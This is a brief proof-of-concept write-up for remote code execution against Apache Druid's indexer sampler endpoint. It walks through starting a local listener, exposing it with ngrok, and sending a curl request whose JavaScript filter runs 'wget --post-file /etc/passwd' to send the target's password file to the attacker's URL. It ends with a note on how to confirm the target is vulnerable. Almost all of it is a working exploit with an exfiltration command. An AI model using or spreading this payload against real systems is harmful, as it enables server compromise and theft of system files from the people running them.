Reference: pikpikcu
First Download and run temporary server (SimpleHTTPServer)
run example: python3 file.py 1337
next running ngrok, example: ngrok http 1337
next make post request to redacted
curl "http://redacted.com/druid/indexer/v1/sampler?for=example-manifest" -H 'Content-Type: application/json' --data '{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
"function": "function(value){return java.lang.Runtime.getRuntime().exec(\"wget --post-file /etc/passwd YOUR_NGROK_URL\")}",
"dimension": "added",
"": {
"enabled": "true"
}
}
}
},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}'
if vuln you will see request body in your server